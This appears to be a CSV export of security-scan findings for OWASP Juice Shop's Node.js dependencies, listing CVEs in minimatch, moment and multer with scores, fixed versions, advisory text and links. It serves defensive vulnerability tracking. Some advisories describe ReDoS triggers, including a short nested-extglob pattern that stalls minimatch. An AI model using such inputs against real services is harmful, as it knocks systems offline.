NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.326309+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.330001+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,161,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.330054+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.330008+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,5.1.6,2026-05-12 17:37:05.333511+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/filehound/node_modules/minimatch/package.json,,True,,False,False,,False,,20d59cc010a4d96f2adffd69dde5e7a041667da30b491fa0fe5bdf32938eda0f,162,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.333570+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 5.1.6,False,False,,2026-05-12 17:37:05.333520+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,5.1.6,2026-05-12 17:37:05.337775+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/filehound/node_modules/minimatch/package.json,,True,,False,False,,False,,bd5e209f81d2bddec58406589e997f7c982dc83de1697dd6d8cc65cdd24c19a5,163,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.337832+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 5.1.6,False,False,,2026-05-12 17:37:05.337784+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,5.1.6,2026-05-12 17:37:05.341693+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. 
This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/filehound/node_modules/minimatch/package.json,,True,,False,False,,False,,dbc2f704ef7bbf4b52e79f8908be650f938f4db9dabb01cd2fa921ab512df9a8,164,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.341782+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 
NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 5.1.6,False,False,,2026-05-12 17:37:05.341704+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,9.0.5,2026-05-12 17:37:05.345575+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/node_modules/minimatch/package.json,,True,,False,False,,False,,5b978f04f9e5ae97c55e236c33598cbcc80e55a260dfca28e530031c2a8fb36b,165,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.345633+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 9.0.5,False,False,,2026-05-12 17:37:05.345584+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,9.0.5,2026-05-12 17:37:05.349397+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/node_modules/minimatch/package.json,,True,,False,False,,False,,b0def4d4e9e17a470db7fa88582551d649cf8911e601a6d816c74f6f29ee9118,166,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.349458+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 9.0.5,False,False,,2026-05-12 17:37:05.349408+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,9.0.5,2026-05-12 17:37:05.353510+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. 
This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/node_modules/minimatch/package.json,,True,,False,False,,False,,ed2385e08014552518b120e00fbc88f83d3ebe65b8eda9d38b0216c1da8f5f56,167,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.353567+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE 
https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 9.0.5,False,False,,2026-05-12 17:37:05.353519+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],moment,2.0.0,2026-05-12 17:37:05.357837+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,400,2026-05-12,,,"nodejs-moment: Regular expression denial of service NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.19.3 NEWLINE NEWLINE The moment module before 2.19.3 for Node.js is prone to a regular expression denial of service via a crafted date string, a different vulnerability than CVE-2016-4055. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/moment/package.json,,True,,False,False,,False,,dac1e6f8286e134b82dcda08827e835bce97ee1a9e8ac6cacff68f9ec4ccf6a8,168,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.357917+00:00,,,,,0,[],2.19.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2017-18214 NEWLINE https://github.com/advisories/GHSA-446m-mv8f-q348 NEWLINE https://github.com/moment/moment NEWLINE https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb NEWLINE https://github.com/moment/moment/issues/4163 NEWLINE https://github.com/moment/moment/pull/4326 NEWLINE https://nodesecurity.io/advisories/532 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2017-18214 NEWLINE https://ubuntu.com/security/notices/USN-4786-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2017-18214 NEWLINE https://www.npmjs.com/advisories/532 NEWLINE https://www.tenable.com/security/tns-2019-02,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2017-18214 Moment 2.0.0,False,False,,2026-05-12 17:37:05.357848+00:00,,True,,,,Trivy Scan,1,Labs Security 
Testing,1,Juice Shop,,CVE-2017-18214,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],moment,2.0.0,2026-05-12 17:37:05.361546+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N,7.5,,,22,2026-05-12,,,"Moment.js: Path traversal in moment.locale NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.29.2 NEWLINE NEWLINE Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/moment/package.json,,True,,False,False,,False,,362f998148c58f245982ed840bda60c6fb1bc650b3e099823e8c6dd829c2fced,169,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.361599+00:00,,,,,0,[],2.29.2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-24785 NEWLINE https://github.com/moment/moment NEWLINE https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5 NEWLINE https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4 NEWLINE https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/ NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5 NEWLINE 
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/ NEWLINE https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q NEWLINE https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-24785 NEWLINE https://security.netapp.com/advisory/ntap-20220513-0006 NEWLINE https://security.netapp.com/advisory/ntap-20220513-0006/ NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002/ NEWLINE https://ubuntu.com/security/notices/USN-5559-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-24785 NEWLINE https://www.tenable.com/security/tns-2022-09,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-24785 Moment 2.0.0,False,False,,2026-05-12 17:37:05.361554+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-24785,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.369267+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,401,2026-05-12,,,"Multer vulnerable to Denial of Service via memory leaks from unclosed streams NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. 
